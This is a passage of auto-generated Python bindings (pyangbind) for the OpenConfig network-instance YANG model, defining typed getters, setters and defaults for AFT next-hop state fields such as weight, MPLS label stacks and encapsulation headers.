namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """pushed_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
"defined-type": "oc-mplst:mpls-label",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="pushed-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
}
)
self.__pushed_mpls_label_stack = t
if hasattr(self, "_set"):
self._set()
def _unset_pushed_mpls_label_stack(self):
self.__pushed_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_decapsulate_header(self):
"""
Getter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop, the local
system performs a decapsulation of the packet - removing the
specified header type. In the case that no next-hop is
specified, the packet header is removed, and a subsequent
forwarding lookup is performed on the packet encapsulated
within the header, matched within the relevant AFT within the
specified network-instance.
"""
return self.__decapsulate_header
def _set_decapsulate_header(self, v, load=False):
"""
Setter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_decapsulate_header is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_decapsulate_header() directly.
YANG Description: When forwarding a packet to the specified next-hop, the local
system performs a decapsulation of the packet - removing the
specified header type. In the case that no next-hop is
specified, the packet header is removed, and a subsequent
forwarding lookup is performed on the packet encapsulated
within the header, matched within the relevant AFT within the
specified network-instance.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """decapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
"defined-type": "oc-aftt:encapsulation-header-type",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="decapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
}
)
self.__decapsulate_header = t
if hasattr(self, "_set"):
self._set()
def _unset_decapsulate_header(self):
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_encapsulate_header(self):
"""
Getter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
return self.__encapsulate_header
def _set_encapsulate_header(self, v, load=False):
"""
Setter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_encapsulate_header is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_encapsulate_header() directly.
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """encapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
"defined-type": "oc-aftt:encapsulation-header-type",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="encapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
}
)
self.__encapsulate_header = t
if hasattr(self, "_set"):
self._set()
def _unset_encapsulate_header(self):
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_origin_protocol(self):
"""
Getter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
YANG Description: The protocol from which the AFT entry was learned.
"""
return self.__origin_protocol
def _set_origin_protocol(self, v, load=False):
"""
Setter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_origin_protocol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_origin_protocol() directly.
YANG Description: The protocol from which the AFT entry was learned.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """origin_protocol must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}},), is_leaf=True, yang_name="origin-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__origin_protocol = t
if hasattr(self, "_set"):
self._set()
def _unset_origin_protocol(self):
self.__origin_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
index = __builtin__.property(_get_index)
weight = __builtin__.property(_get_weight)
ip_address = __builtin__.property(_get_ip_address)
mac_address = __builtin__.property(_get_mac_address)
popped_mpls_label_stack = __builtin__.property(_get_popped_mpls_label_stack)
pushed_mpls_label_stack = __builtin__.property(_get_pushed_mpls_label_stack)
decapsulate_header = __builtin__.property(_get_decapsulate_header)
encapsulate_header = __builtin__.property(_get_encapsulate_header)
origin_protocol = __builtin__.property(_get_origin_protocol)
_pyangbind_elements = OrderedDict(
[
("index", index),
("weight", weight),
("ip_address", ip_address),
("mac_address", mac_address),
("popped_mpls_label_stack", popped_mpls_label_stack),
("pushed_mpls_label_stack", pushed_mpls_label_stack),
("decapsulate_header", decapsulate_header),
("encapsulate_header", encapsulate_header),
("origin_protocol", origin_protocol),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/afts/aft/entries/entry/next-hops/next-hop/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state parameters relating to the AFT
next-hop entry
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__index",
"__weight",
"__ip_address",
"__mac_address",
"__popped_mpls_label_stack",
"__pushed_mpls_label_stack",
"__decapsulate_header",
"__encapsulate_header",
"__origin_protocol",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__index = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__ip_address = YANGDynClass(
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
self.__mac_address = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
self.__popped_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
self.__pushed_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
self.__origin_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"afts",
"aft",
"entries",
"entry",
"next-hops",
"next-hop",
"state",
]
def _get_index(self):
"""
Getter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
YANG Description: A unique entry for the next-hop
"""
return self.__index
def _set_index(self, v, load=False):
"""
Setter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_index is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_index() directly.
YANG Description: A unique entry for the next-hop
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """index must be of a type compatible with uint64""",
"defined-type": "uint64",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=False)""",
}
)
self.__index = t
if hasattr(self, "_set"):
self._set()
def _unset_index(self):
self.__index = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..18446744073709551615"]},
int_size=64,
),
is_leaf=True,
yang_name="index",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint64",
is_config=False,
)
def _get_weight(self):
"""
Getter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
YANG Description: The weight of the next-hop. Traffic is balanced according to
the ratio described by the relative weights of the next hops
that exist for the AFT entry. Note that all next-hops that are
specified are assumed to be active next-hops and therefore
eligible (and selected) to be installed in the FIB, and hence
used for packet forwarding.
"""
return self.__weight
def _set_weight(self, v, load=False):
"""
Setter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_weight() directly.
YANG Description: The weight of the next-hop. Traffic is balanced according to
the ratio described by the relative weights of the next hops
that exist for the AFT entry. Note that all next-hops that are
specified are assumed to be active next-hops and therefore
eligible (and selected) to be installed in the FIB, and hence
used for packet forwarding.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
